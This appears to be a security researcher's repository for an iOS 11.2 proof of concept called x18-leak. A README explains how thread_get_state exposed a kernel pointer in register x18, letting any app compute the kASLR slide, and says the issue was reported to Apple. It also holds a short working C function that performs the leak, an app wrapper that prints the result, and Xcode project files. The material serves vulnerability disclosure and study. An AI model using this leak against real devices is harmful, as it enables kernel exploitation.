├── x18-leak.xcodeproj ├── project.xcworkspace │ └── contents.xcworkspacedata └── project.pbxproj ├── x18-leak ├── ViewController.h ├── AppDelegate.h ├── x18_leak.h ├── main.m ├── ViewController.m ├── Info.plist ├── Base.lproj │ ├── Main.storyboard │ └── LaunchScreen.storyboard ├── Assets.xcassets │ └── AppIcon.appiconset │ │ └── Contents.json ├── AppDelegate.m └── x18_leak.c └── README.md /x18-leak.xcodeproj/project.xcworkspace/contents.xcworkspacedata: -------------------------------------------------------------------------------- 1 | 2 | 4 | 6 | 7 | 8 | -------------------------------------------------------------------------------- /x18-leak/ViewController.h: -------------------------------------------------------------------------------- 1 | // 2 | // ViewController.h 3 | // x18-leak 4 | // 5 | // Created by Brandon Azad on 2/26/18. 6 | // Copyright © 2018 Brandon Azad. All rights reserved. 7 | // 8 | 9 | #import 10 | 11 | @interface ViewController : UIViewController 12 | 13 | 14 | @end 15 | 16 | -------------------------------------------------------------------------------- /x18-leak/AppDelegate.h: -------------------------------------------------------------------------------- 1 | // 2 | // AppDelegate.h 3 | // x18-leak 4 | // 5 | // Created by Brandon Azad on 2/26/18. 6 | // Copyright © 2018 Brandon Azad. All rights reserved. 7 | // 8 | 9 | #import 10 | 11 | @interface AppDelegate : UIResponder 12 | 13 | @property (strong, nonatomic) UIWindow *window; 14 | 15 | 16 | @end 17 | 18 | -------------------------------------------------------------------------------- /x18-leak/x18_leak.h: -------------------------------------------------------------------------------- 1 | #ifndef X18_LEAK__X18_LEAK_H_ 2 | #define X18_LEAK__X18_LEAK_H_ 3 | 4 | #include 5 | 6 | /* 7 | * x18_leak 8 | * 9 | * Description: 10 | * Leak the address of the Lel0_synchronous_vector_64_long kernel function. 
11 | * 12 | * Returns: 13 | * The kernel address of Lel0_synchronous_vector_64_long or 0. 14 | */ 15 | uint64_t x18_leak(void); 16 | 17 | #endif 18 | -------------------------------------------------------------------------------- /x18-leak/main.m: -------------------------------------------------------------------------------- 1 | // 2 | // main.m 3 | // x18-leak 4 | // 5 | // Created by Brandon Azad on 2/26/18. 6 | // Copyright © 2018 Brandon Azad. All rights reserved. 7 | // 8 | 9 | #import 10 | #import "AppDelegate.h" 11 | /* Program entry point: passes argc/argv to UIApplicationMain and names AppDelegate as the application delegate class; the return value of UIApplicationMain is returned from inside the autorelease pool. */ 12 | int main(int argc, char * argv[]) { 13 | @autoreleasepool { 14 | return UIApplicationMain(argc, argv, nil, NSStringFromClass([AppDelegate class])); 15 | } 16 | } 17 | -------------------------------------------------------------------------------- /x18-leak/ViewController.m: -------------------------------------------------------------------------------- 1 | // 2 | // ViewController.m 3 | // x18-leak 4 | // 5 | // Created by Brandon Azad on 2/26/18. 6 | // Copyright © 2018 Brandon Azad. All rights reserved. 7 | // 8 | 9 | #import "ViewController.h" 10 | 11 | @interface ViewController () 12 | 13 | @end 14 | 15 | @implementation ViewController 16 | /* Template override: forwards to super and does nothing else. */ 17 | - (void)viewDidLoad { 18 | [super viewDidLoad]; 19 | // Do any additional setup after loading the view, typically from a nib. 20 | } 21 | 22 | 23 | - (void)didReceiveMemoryWarning { 24 | [super didReceiveMemoryWarning]; 25 | // Dispose of any resources that can be recreated. 
26 | } 27 | 28 | 29 | @end 30 | -------------------------------------------------------------------------------- /x18-leak/Info.plist: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | CFBundleDevelopmentRegion 6 | $(DEVELOPMENT_LANGUAGE) 7 | CFBundleExecutable 8 | $(EXECUTABLE_NAME) 9 | CFBundleIdentifier 10 | $(PRODUCT_BUNDLE_IDENTIFIER) 11 | CFBundleInfoDictionaryVersion 12 | 6.0 13 | CFBundleName 14 | $(PRODUCT_NAME) 15 | CFBundlePackageType 16 | APPL 17 | CFBundleShortVersionString 18 | 1.0 19 | CFBundleVersion 20 | 1 21 | LSRequiresIPhoneOS 22 | 23 | UILaunchStoryboardName 24 | LaunchScreen 25 | UIMainStoryboardFile 26 | Main 27 | UIRequiredDeviceCapabilities 28 | 29 | armv7 30 | 31 | UISupportedInterfaceOrientations 32 | 33 | UIInterfaceOrientationPortrait 34 | UIInterfaceOrientationLandscapeLeft 35 | UIInterfaceOrientationLandscapeRight 36 | 37 | UISupportedInterfaceOrientations~ipad 38 | 39 | UIInterfaceOrientationPortrait 40 | UIInterfaceOrientationPortraitUpsideDown 41 | UIInterfaceOrientationLandscapeLeft 42 | UIInterfaceOrientationLandscapeRight 43 | 44 | 45 | 46 | -------------------------------------------------------------------------------- /x18-leak/Base.lproj/Main.storyboard: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | 24 | 25 | -------------------------------------------------------------------------------- /x18-leak/Base.lproj/LaunchScreen.storyboard: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | 24 | 25 | 26 | -------------------------------------------------------------------------------- /x18-leak/Assets.xcassets/AppIcon.appiconset/Contents.json: 
-------------------------------------------------------------------------------- 1 | { 2 | "images" : [ 3 | { 4 | "idiom" : "iphone", 5 | "size" : "20x20", 6 | "scale" : "2x" 7 | }, 8 | { 9 | "idiom" : "iphone", 10 | "size" : "20x20", 11 | "scale" : "3x" 12 | }, 13 | { 14 | "idiom" : "iphone", 15 | "size" : "29x29", 16 | "scale" : "2x" 17 | }, 18 | { 19 | "idiom" : "iphone", 20 | "size" : "29x29", 21 | "scale" : "3x" 22 | }, 23 | { 24 | "idiom" : "iphone", 25 | "size" : "40x40", 26 | "scale" : "2x" 27 | }, 28 | { 29 | "idiom" : "iphone", 30 | "size" : "40x40", 31 | "scale" : "3x" 32 | }, 33 | { 34 | "idiom" : "iphone", 35 | "size" : "60x60", 36 | "scale" : "2x" 37 | }, 38 | { 39 | "idiom" : "iphone", 40 | "size" : "60x60", 41 | "scale" : "3x" 42 | }, 43 | { 44 | "idiom" : "ipad", 45 | "size" : "20x20", 46 | "scale" : "1x" 47 | }, 48 | { 49 | "idiom" : "ipad", 50 | "size" : "20x20", 51 | "scale" : "2x" 52 | }, 53 | { 54 | "idiom" : "ipad", 55 | "size" : "29x29", 56 | "scale" : "1x" 57 | }, 58 | { 59 | "idiom" : "ipad", 60 | "size" : "29x29", 61 | "scale" : "2x" 62 | }, 63 | { 64 | "idiom" : "ipad", 65 | "size" : "40x40", 66 | "scale" : "1x" 67 | }, 68 | { 69 | "idiom" : "ipad", 70 | "size" : "40x40", 71 | "scale" : "2x" 72 | }, 73 | { 74 | "idiom" : "ipad", 75 | "size" : "76x76", 76 | "scale" : "1x" 77 | }, 78 | { 79 | "idiom" : "ipad", 80 | "size" : "76x76", 81 | "scale" : "2x" 82 | }, 83 | { 84 | "idiom" : "ipad", 85 | "size" : "83.5x83.5", 86 | "scale" : "2x" 87 | } 88 | ], 89 | "info" : { 90 | "version" : 1, 91 | "author" : "xcode" 92 | } 93 | } -------------------------------------------------------------------------------- /x18-leak/AppDelegate.m: -------------------------------------------------------------------------------- 1 | // 2 | // AppDelegate.m 3 | // x18-leak 4 | // 5 | // Created by Brandon Azad on 2/26/18. 6 | // Copyright © 2018 Brandon Azad. All rights reserved. 
7 | // 8 | 9 | #import "AppDelegate.h" 10 | 11 | #include "x18_leak.h" 12 | 13 | @interface AppDelegate () 14 | 15 | @end 16 | 17 | @implementation AppDelegate 18 | 19 | /* Launch hook used as the demo driver: calls x18_leak() once, prints the result to stdout and exits the process. x18_leak.h documents the result as a kernel address or 0, so a printed value of all zeroes means no kernel-looking pointer was reported. */ 20 | - (BOOL)application:(UIApplication *)application didFinishLaunchingWithOptions:(NSDictionary *)launchOptions { 21 | // Override point for customization after application launch. 22 | printf("Lel0_synchronous_vector_64_long: 0x%016llx\n", x18_leak()); 23 | exit(0); /* ends the process immediately after printing; the return on the next line is unreachable */ 24 | return YES; 25 | } 26 | 27 | 28 | - (void)applicationWillResignActive:(UIApplication *)application { 29 | // Sent when the application is about to move from active to inactive state. This can occur for certain types of temporary interruptions (such as an incoming phone call or SMS message) or when the user quits the application and it begins the transition to the background state. 30 | // Use this method to pause ongoing tasks, disable timers, and invalidate graphics rendering callbacks. Games should use this method to pause the game. 31 | } 32 | 33 | 34 | - (void)applicationDidEnterBackground:(UIApplication *)application { 35 | // Use this method to release shared resources, save user data, invalidate timers, and store enough application state information to restore your application to its current state in case it is terminated later. 36 | // If your application supports background execution, this method is called instead of applicationWillTerminate: when the user quits. 37 | } 38 | 39 | 40 | - (void)applicationWillEnterForeground:(UIApplication *)application { 41 | // Called as part of the transition from the background to the active state; here you can undo many of the changes made on entering the background. 42 | } 43 | 44 | 45 | - (void)applicationDidBecomeActive:(UIApplication *)application { 46 | // Restart any tasks that were paused (or not yet started) while the application was inactive. If the application was previously in the background, optionally refresh the user interface. 
47 | } 48 | 49 | 50 | - (void)applicationWillTerminate:(UIApplication *)application { 51 | // Called when the application is about to terminate. Save data if appropriate. See also applicationDidEnterBackground:. 52 | } 53 | 54 | 55 | @end 56 | -------------------------------------------------------------------------------- /x18-leak/x18_leak.c: -------------------------------------------------------------------------------- 1 | /* 2 | * x18-leak 3 | * Brandon Azad 4 | * 5 | * 6 | * x18-leak 7 | * ================================================================================================ 8 | * 9 | * In iOS 11.2, Apple introduced a feature on arm64 called __ARM_KERNEL_PROTECT__. According to a 10 | * comment in osfmk/arm64/proc_reg.h: 11 | * 12 | * __ARM_KERNEL_PROTECT__ is a feature intended to guard against potential 13 | * architectural or microarchitectural vulnerabilities that could allow cores to 14 | * read/access EL1-only mappings while in EL0 mode. This is achieved by 15 | * removing as many mappings as possible when the core transitions to EL0 mode 16 | * from EL1 mode, and restoring those mappings when the core transitions to EL1 17 | * mode from EL0 mode. 18 | * 19 | * That is, when transitioning from EL1 (kernel mode) to EL0 (user mode), as many kernel mappings 20 | * as possible will be removed. This should limit the possible attack surface against kernel memory 21 | * mappings when exploiting microarchitectural vulnerabilities like Spectre or Meltdown. 22 | * 23 | * If you look through the diff between XNU versions 4570.20.62 and 4570.31.3, you'll find a number 24 | * of new references to register x18 pop up in the file osfmk/arm64/locore.s in relation to 25 | * __ARM_KERNEL_PROTECT__. 
In particular, you'll see that the exception vector 26 | * Lel0_synchronous_vector_64, which is the exception vector invoked on a system call (instruction 27 | * "svc #0"), now looks like this: 28 | * 29 | * .text 30 | * .align 7 31 | * Lel0_synchronous_vector_64: 32 | * MAP_KERNEL 33 | * BRANCH_TO_KVA_VECTOR Lel0_synchronous_vector_64_long, 8 34 | * 35 | * The macro BRANCH_TO_KVA_VECTOR is defined as: 36 | * 37 | * .macro BRANCH_TO_KVA_VECTOR 38 | * #if __ARM_KERNEL_PROTECT__ 39 | * /@ 40 | * * Find the kernelcache table for the exception vectors by accessing 41 | * * the per-CPU data. 42 | * @/ 43 | * mrs x18, TPIDR_EL1 44 | * ldr x18, [x18, ACT_CPUDATAP] 45 | * ldr x18, [x18, CPU_EXC_VECTORS] 46 | * 47 | * /@ 48 | * * Get the handler for this exception and jump to it. 49 | * @/ 50 | * ldr x18, [x18, #($1 << 3)] 51 | * br x18 52 | * #else 53 | * b $0 54 | * #endif /@ __ARM_KERNEL_PROTECT__ @/ 55 | * .endmacro 56 | * 57 | * This macro performs an indirect branch to the true exception vector implementation, 58 | * Lel0_synchronous_vector_64_long, by loading a pointer to that function into the register x18. 59 | * Notice, however, that this clobber of x18 happens before the userspace registers are saved by 60 | * the function fleh_dispatch64, which is called by Lel0_synchronous_vector_64_long. This means 61 | * that when the user registers are saved, x18 will actually be a pointer to 62 | * Lel0_synchronous_vector_64_long rather than the original value from userspace. 63 | * 64 | * Even though x18 is cleared on exception return, storing a kernel pointer in the user register 65 | * state is problematic because thread_get_state() can be used to copy the saved user register 66 | * state back to userspace, including the value of register x18. All a thread needs to do in order 67 | * to obtain the address of the Lel0_synchronous_vector_64_long function is call thread_get_state() 68 | * on itself and look at the reported value of x18. 
This makes it trivial to determine the kASLR 69 | * slide by subtracting the value of x18 thus obtained by the static address of 70 | * Lel0_synchronous_vector_64_long. 71 | * 72 | */ 73 | #include "x18_leak.h" 74 | 75 | #include 76 | /* x18_leak: reads the calling thread's own saved ARM64 register state with thread_get_state() and returns the reported x18 when its upper 32 bits equal 0xfffffff0. Returns 0 both when thread_get_state() fails and when x18 does not match that pattern, so a 0 result does not tell the two cases apart. NOTE(review): on a kernel that does not expose the clobbered x18 this is presumably expected to return 0, which makes the function usable as a presence check for the issue - confirm on the target build. */ 77 | uint64_t 78 | x18_leak() { 79 | mach_port_t thread = mach_thread_self(); /* port naming the current thread; released below once the state has been read */ 80 | arm_thread_state64_t state; 81 | mach_msg_type_number_t count = ARM_THREAD_STATE64_COUNT; 82 | kern_return_t kr = thread_get_state(thread, ARM_THREAD_STATE64, 83 | (thread_state_t) &state, &count); /* the deallocate on the next line runs before kr is checked, so neither early return leaks the thread port */ 84 | mach_port_deallocate(mach_task_self(), thread); 85 | if (kr != KERN_SUCCESS) { 86 | return 0; 87 | } /* sanity filter: accept only values whose upper 32 bits are 0xfffffff0, presumably the range kernel pointers fall in on the affected devices (confirm); any other x18 is reported as 0 */ 88 | if ((state.__x[18] & 0xffffffff00000000) != 0xfffffff000000000) { 89 | return 0; 90 | } 91 | return state.__x[18]; 92 | } 93 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | x18-leak 2 | =================================================================================================== 3 | 4 | iOS 11.2 introduced a kernel information leak that could be used to determine the kASLR slide. The 5 | issue was the result of a newly added feature, `__ARM_KERNEL_PROTECT__`, that inadvertently caused 6 | the address of the kernel function `Lel0_synchronous_vector_64_long` to appear in register `x18` 7 | when obtaining the values of a thread's registers using `thread_get_state`. The issue was 8 | discovered when kernel pointers started appearing in iOS application crash logs. 9 | 10 | 11 | The vulnerability 12 | --------------------------------------------------------------------------------------------------- 13 | 14 | In iOS 11.2, Apple introduced a feature on arm64 called `__ARM_KERNEL_PROTECT__`. 
According to a 15 | comment in [`osfmk/arm64/proc_reg.h`][proc_reg.h]: 16 | 17 | [proc_reg.h]: https://opensource.apple.com/source/xnu/xnu-4570.31.3/osfmk/arm64/proc_reg.h.auto.html 18 | 19 | __ARM_KERNEL_PROTECT__ is a feature intended to guard against potential 20 | architectural or microarchitectural vulnerabilities that could allow cores to 21 | read/access EL1-only mappings while in EL0 mode. This is achieved by 22 | removing as many mappings as possible when the core transitions to EL0 mode 23 | from EL1 mode, and restoring those mappings when the core transitions to EL1 24 | mode from EL0 mode. 25 | 26 | That is, when transitioning from EL1 (kernel mode) to EL0 (user mode), as many kernel mappings as 27 | possible will be removed. This should limit the possible attack surface against kernel memory 28 | mappings when exploiting microarchitectural vulnerabilities like Spectre or Meltdown. 29 | 30 | If you look through the diff between XNU versions 4570.20.62 and 4570.31.3, you'll find a number of 31 | new references to register `x18` pop up in the file [`osfmk/arm64/locore.s`][XNU 4570.31.3 32 | locore.s] in relation to `__ARM_KERNEL_PROTECT__`. In particular, you'll see that the exception 33 | vector `Lel0_synchronous_vector_64`, which is the exception vector invoked on a system call 34 | (instruction `svc #0`), now looks like this: 35 | 36 | [XNU 4570.31.3 locore.s]: https://opensource.apple.com/source/xnu/xnu-4570.31.3/osfmk/arm64/locore.s.auto.html 37 | 38 | ```assembly 39 | .text 40 | .align 7 41 | Lel0_synchronous_vector_64: 42 | MAP_KERNEL 43 | BRANCH_TO_KVA_VECTOR Lel0_synchronous_vector_64_long, 8 44 | ``` 45 | 46 | The macro `BRANCH_TO_KVA_VECTOR` is defined as: 47 | 48 | ```assembly 49 | .macro BRANCH_TO_KVA_VECTOR 50 | #if __ARM_KERNEL_PROTECT__ 51 | /* 52 | * Find the kernelcache table for the exception vectors by accessing 53 | * the per-CPU data. 
54 | */ 55 | mrs x18, TPIDR_EL1 56 | ldr x18, [x18, ACT_CPUDATAP] 57 | ldr x18, [x18, CPU_EXC_VECTORS] 58 | 59 | /* 60 | * Get the handler for this exception and jump to it. 61 | */ 62 | ldr x18, [x18, #($1 << 3)] 63 | br x18 64 | #else 65 | b $0 66 | #endif /* __ARM_KERNEL_PROTECT__ */ 67 | .endmacro 68 | ``` 69 | 70 | This macro performs an indirect branch to the true exception vector implementation, 71 | `Lel0_synchronous_vector_64_long`, by loading a pointer to that function into the register `x18`. 72 | Notice, however, that this clobber of `x18` happens before the userspace registers are saved by the 73 | function `fleh_dispatch64`, which is called by `Lel0_synchronous_vector_64_long`. This means that 74 | when the user registers are saved, `x18` will actually be a pointer to 75 | `Lel0_synchronous_vector_64_long` rather than the original value from userspace. 76 | 77 | Even though `x18` is cleared on exception return, storing a kernel pointer in the user register 78 | state is problematic because `thread_get_state` can be used to copy the saved user register state 79 | back to userspace, including the value of register `x18`. All a thread needs to do in order to 80 | obtain the address of the `Lel0_synchronous_vector_64_long` function is call `thread_get_state` on 81 | itself and look at the reported value of `x18`. This makes it trivial to determine the kASLR slide 82 | by subtracting the static address of `Lel0_synchronous_vector_64_long` from the value of 83 | `x18` thus obtained. 84 | 85 | 86 | Exploitation 87 | --------------------------------------------------------------------------------------------------- 88 | 89 | As mentioned above, exploitation is trivial: simply call the function `thread_get_state`, look at 90 | the value for register `x18`, and subtract from it the static address of the kernel function 91 | `Lel0_synchronous_vector_64_long`. 
92 | 93 | 94 | Discovery 95 | --------------------------------------------------------------------------------------------------- 96 | 97 | I discovered this issue on February 26, 2018, after noticing a kernel pointer in register `x18` of 98 | an iOS application crash log. A quick check showed that the same value appeared in register `x18` 99 | of every crash log on the device, which suggested a serious information leak. 100 | 101 | I next tried to determine what exactly was going on with register `x18` through experimentation. I 102 | set a breakpoint in an empty iOS app and used lldb to read the value of register `x18`, confirming 103 | that the leak was not restricted to crashing applications. Next I tried to read the value of `x18` 104 | using inline assembly and found that the value obtained did not match the value shown by the 105 | debugger when using a command like `reg read x18`. This suggested that perhaps the leak was really 106 | in `thread_get_state`, and that register `x18` didn't truly contain a kernel pointer while the CPU 107 | was executing in userspace. A quick proof-of-concept that read the value of `x18` using 108 | `thread_get_state` confirmed that this function was indeed the source of the leak. 109 | 110 | 111 | Timeline 112 | --------------------------------------------------------------------------------------------------- 113 | 114 | I reported the issue to Apple on February 26, 2018, the same day I discovered it. 115 | 116 | 117 | --------------------------------------------------------------------------------------------------- 118 | By Brandon Azad 119 | -------------------------------------------------------------------------------- /x18-leak.xcodeproj/project.pbxproj: -------------------------------------------------------------------------------- 1 | // !$*UTF8*$! 
2 | { 3 | archiveVersion = 1; 4 | classes = { 5 | }; 6 | objectVersion = 48; 7 | objects = { 8 | 9 | /* Begin PBXBuildFile section */ 10 | 5544C58A2044E23F006514D9 /* AppDelegate.m in Sources */ = {isa = PBXBuildFile; fileRef = 5544C5892044E23F006514D9 /* AppDelegate.m */; }; 11 | 5544C58D2044E23F006514D9 /* ViewController.m in Sources */ = {isa = PBXBuildFile; fileRef = 5544C58C2044E23F006514D9 /* ViewController.m */; }; 12 | 5544C5902044E23F006514D9 /* Main.storyboard in Resources */ = {isa = PBXBuildFile; fileRef = 5544C58E2044E23F006514D9 /* Main.storyboard */; }; 13 | 5544C5922044E23F006514D9 /* Assets.xcassets in Resources */ = {isa = PBXBuildFile; fileRef = 5544C5912044E23F006514D9 /* Assets.xcassets */; }; 14 | 5544C5952044E23F006514D9 /* LaunchScreen.storyboard in Resources */ = {isa = PBXBuildFile; fileRef = 5544C5932044E23F006514D9 /* LaunchScreen.storyboard */; }; 15 | 5544C5982044E240006514D9 /* main.m in Sources */ = {isa = PBXBuildFile; fileRef = 5544C5972044E240006514D9 /* main.m */; }; 16 | 5544C5A02044E2C6006514D9 /* x18_leak.c in Sources */ = {isa = PBXBuildFile; fileRef = 5544C59F2044E2C6006514D9 /* x18_leak.c */; }; 17 | /* End PBXBuildFile section */ 18 | 19 | /* Begin PBXFileReference section */ 20 | 5544C5852044E23F006514D9 /* x18-leak.app */ = {isa = PBXFileReference; explicitFileType = wrapper.application; includeInIndex = 0; path = "x18-leak.app"; sourceTree = BUILT_PRODUCTS_DIR; }; 21 | 5544C5882044E23F006514D9 /* AppDelegate.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = AppDelegate.h; sourceTree = ""; }; 22 | 5544C5892044E23F006514D9 /* AppDelegate.m */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.objc; path = AppDelegate.m; sourceTree = ""; }; 23 | 5544C58B2044E23F006514D9 /* ViewController.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = ViewController.h; sourceTree = ""; }; 24 | 5544C58C2044E23F006514D9 /* ViewController.m */ = {isa = PBXFileReference; 
lastKnownFileType = sourcecode.c.objc; path = ViewController.m; sourceTree = ""; }; 25 | 5544C58F2044E23F006514D9 /* Base */ = {isa = PBXFileReference; lastKnownFileType = file.storyboard; name = Base; path = Base.lproj/Main.storyboard; sourceTree = ""; }; 26 | 5544C5912044E23F006514D9 /* Assets.xcassets */ = {isa = PBXFileReference; lastKnownFileType = folder.assetcatalog; path = Assets.xcassets; sourceTree = ""; }; 27 | 5544C5942044E23F006514D9 /* Base */ = {isa = PBXFileReference; lastKnownFileType = file.storyboard; name = Base; path = Base.lproj/LaunchScreen.storyboard; sourceTree = ""; }; 28 | 5544C5962044E240006514D9 /* Info.plist */ = {isa = PBXFileReference; lastKnownFileType = text.plist.xml; path = Info.plist; sourceTree = ""; }; 29 | 5544C5972044E240006514D9 /* main.m */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.objc; path = main.m; sourceTree = ""; }; 30 | 5544C59E2044E2C6006514D9 /* x18_leak.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = x18_leak.h; sourceTree = ""; }; 31 | 5544C59F2044E2C6006514D9 /* x18_leak.c */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.c; path = x18_leak.c; sourceTree = ""; }; 32 | /* End PBXFileReference section */ 33 | 34 | /* Begin PBXFrameworksBuildPhase section */ 35 | 5544C5822044E23F006514D9 /* Frameworks */ = { 36 | isa = PBXFrameworksBuildPhase; 37 | buildActionMask = 2147483647; 38 | files = ( 39 | ); 40 | runOnlyForDeploymentPostprocessing = 0; 41 | }; 42 | /* End PBXFrameworksBuildPhase section */ 43 | 44 | /* Begin PBXGroup section */ 45 | 5544C57C2044E23F006514D9 = { 46 | isa = PBXGroup; 47 | children = ( 48 | 5544C5872044E23F006514D9 /* x18-leak */, 49 | 5544C5862044E23F006514D9 /* Products */, 50 | ); 51 | sourceTree = ""; 52 | }; 53 | 5544C5862044E23F006514D9 /* Products */ = { 54 | isa = PBXGroup; 55 | children = ( 56 | 5544C5852044E23F006514D9 /* x18-leak.app */, 57 | ); 58 | name = Products; 59 | sourceTree = ""; 60 | }; 61 | 
5544C5872044E23F006514D9 /* x18-leak */ = { 62 | isa = PBXGroup; 63 | children = ( 64 | 5544C5882044E23F006514D9 /* AppDelegate.h */, 65 | 5544C5892044E23F006514D9 /* AppDelegate.m */, 66 | 5544C58B2044E23F006514D9 /* ViewController.h */, 67 | 5544C58C2044E23F006514D9 /* ViewController.m */, 68 | 5544C58E2044E23F006514D9 /* Main.storyboard */, 69 | 5544C5912044E23F006514D9 /* Assets.xcassets */, 70 | 5544C5932044E23F006514D9 /* LaunchScreen.storyboard */, 71 | 5544C5962044E240006514D9 /* Info.plist */, 72 | 5544C5972044E240006514D9 /* main.m */, 73 | 5544C59E2044E2C6006514D9 /* x18_leak.h */, 74 | 5544C59F2044E2C6006514D9 /* x18_leak.c */, 75 | ); 76 | path = "x18-leak"; 77 | sourceTree = ""; 78 | }; 79 | /* End PBXGroup section */ 80 | 81 | /* Begin PBXNativeTarget section */ 82 | 5544C5842044E23F006514D9 /* x18-leak */ = { 83 | isa = PBXNativeTarget; 84 | buildConfigurationList = 5544C59B2044E240006514D9 /* Build configuration list for PBXNativeTarget "x18-leak" */; 85 | buildPhases = ( 86 | 5544C5812044E23F006514D9 /* Sources */, 87 | 5544C5822044E23F006514D9 /* Frameworks */, 88 | 5544C5832044E23F006514D9 /* Resources */, 89 | ); 90 | buildRules = ( 91 | ); 92 | dependencies = ( 93 | ); 94 | name = "x18-leak"; 95 | productName = "x18-leak"; 96 | productReference = 5544C5852044E23F006514D9 /* x18-leak.app */; 97 | productType = "com.apple.product-type.application"; 98 | }; 99 | /* End PBXNativeTarget section */ 100 | 101 | /* Begin PBXProject section */ 102 | 5544C57D2044E23F006514D9 /* Project object */ = { 103 | isa = PBXProject; 104 | attributes = { 105 | LastUpgradeCheck = 0920; 106 | ORGANIZATIONNAME = "Brandon Azad"; 107 | TargetAttributes = { 108 | 5544C5842044E23F006514D9 = { 109 | CreatedOnToolsVersion = 9.2; 110 | ProvisioningStyle = Automatic; 111 | }; 112 | }; 113 | }; 114 | buildConfigurationList = 5544C5802044E23F006514D9 /* Build configuration list for PBXProject "x18-leak" */; 115 | compatibilityVersion = "Xcode 8.0"; 116 | developmentRegion = 
en; 117 | hasScannedForEncodings = 0; 118 | knownRegions = ( 119 | en, 120 | Base, 121 | ); 122 | mainGroup = 5544C57C2044E23F006514D9; 123 | productRefGroup = 5544C5862044E23F006514D9 /* Products */; 124 | projectDirPath = ""; 125 | projectRoot = ""; 126 | targets = ( 127 | 5544C5842044E23F006514D9 /* x18-leak */, 128 | ); 129 | }; 130 | /* End PBXProject section */ 131 | 132 | /* Begin PBXResourcesBuildPhase section */ 133 | 5544C5832044E23F006514D9 /* Resources */ = { 134 | isa = PBXResourcesBuildPhase; 135 | buildActionMask = 2147483647; 136 | files = ( 137 | 5544C5952044E23F006514D9 /* LaunchScreen.storyboard in Resources */, 138 | 5544C5922044E23F006514D9 /* Assets.xcassets in Resources */, 139 | 5544C5902044E23F006514D9 /* Main.storyboard in Resources */, 140 | ); 141 | runOnlyForDeploymentPostprocessing = 0; 142 | }; 143 | /* End PBXResourcesBuildPhase section */ 144 | 145 | /* Begin PBXSourcesBuildPhase section */ 146 | 5544C5812044E23F006514D9 /* Sources */ = { 147 | isa = PBXSourcesBuildPhase; 148 | buildActionMask = 2147483647; 149 | files = ( 150 | 5544C5A02044E2C6006514D9 /* x18_leak.c in Sources */, 151 | 5544C58D2044E23F006514D9 /* ViewController.m in Sources */, 152 | 5544C5982044E240006514D9 /* main.m in Sources */, 153 | 5544C58A2044E23F006514D9 /* AppDelegate.m in Sources */, 154 | ); 155 | runOnlyForDeploymentPostprocessing = 0; 156 | }; 157 | /* End PBXSourcesBuildPhase section */ 158 | 159 | /* Begin PBXVariantGroup section */ 160 | 5544C58E2044E23F006514D9 /* Main.storyboard */ = { 161 | isa = PBXVariantGroup; 162 | children = ( 163 | 5544C58F2044E23F006514D9 /* Base */, 164 | ); 165 | name = Main.storyboard; 166 | sourceTree = ""; 167 | }; 168 | 5544C5932044E23F006514D9 /* LaunchScreen.storyboard */ = { 169 | isa = PBXVariantGroup; 170 | children = ( 171 | 5544C5942044E23F006514D9 /* Base */, 172 | ); 173 | name = LaunchScreen.storyboard; 174 | sourceTree = ""; 175 | }; 176 | /* End PBXVariantGroup section */ 177 | 178 | /* Begin 
XCBuildConfiguration section */ 179 | 5544C5992044E240006514D9 /* Debug */ = { 180 | isa = XCBuildConfiguration; 181 | buildSettings = { 182 | ALWAYS_SEARCH_USER_PATHS = NO; 183 | CLANG_ANALYZER_NONNULL = YES; 184 | CLANG_ANALYZER_NUMBER_OBJECT_CONVERSION = YES_AGGRESSIVE; 185 | CLANG_CXX_LANGUAGE_STANDARD = "gnu++14"; 186 | CLANG_CXX_LIBRARY = "libc++"; 187 | CLANG_ENABLE_MODULES = YES; 188 | CLANG_ENABLE_OBJC_ARC = YES; 189 | CLANG_WARN_BLOCK_CAPTURE_AUTORELEASING = YES; 190 | CLANG_WARN_BOOL_CONVERSION = YES; 191 | CLANG_WARN_COMMA = YES; 192 | CLANG_WARN_CONSTANT_CONVERSION = YES; 193 | CLANG_WARN_DIRECT_OBJC_ISA_USAGE = YES_ERROR; 194 | CLANG_WARN_DOCUMENTATION_COMMENTS = YES; 195 | CLANG_WARN_EMPTY_BODY = YES; 196 | CLANG_WARN_ENUM_CONVERSION = YES; 197 | CLANG_WARN_INFINITE_RECURSION = YES; 198 | CLANG_WARN_INT_CONVERSION = YES; 199 | CLANG_WARN_NON_LITERAL_NULL_CONVERSION = YES; 200 | CLANG_WARN_OBJC_LITERAL_CONVERSION = YES; 201 | CLANG_WARN_OBJC_ROOT_CLASS = YES_ERROR; 202 | CLANG_WARN_RANGE_LOOP_ANALYSIS = YES; 203 | CLANG_WARN_STRICT_PROTOTYPES = YES; 204 | CLANG_WARN_SUSPICIOUS_MOVE = YES; 205 | CLANG_WARN_UNGUARDED_AVAILABILITY = YES_AGGRESSIVE; 206 | CLANG_WARN_UNREACHABLE_CODE = YES; 207 | CLANG_WARN__DUPLICATE_METHOD_MATCH = YES; 208 | CODE_SIGN_IDENTITY = "iPhone Developer"; 209 | COPY_PHASE_STRIP = NO; 210 | DEBUG_INFORMATION_FORMAT = dwarf; 211 | ENABLE_STRICT_OBJC_MSGSEND = YES; 212 | ENABLE_TESTABILITY = YES; 213 | GCC_C_LANGUAGE_STANDARD = gnu11; 214 | GCC_DYNAMIC_NO_PIC = NO; 215 | GCC_NO_COMMON_BLOCKS = YES; 216 | GCC_OPTIMIZATION_LEVEL = 0; 217 | GCC_PREPROCESSOR_DEFINITIONS = ( 218 | "DEBUG=1", 219 | "$(inherited)", 220 | ); 221 | GCC_WARN_64_TO_32_BIT_CONVERSION = YES; 222 | GCC_WARN_ABOUT_RETURN_TYPE = YES_ERROR; 223 | 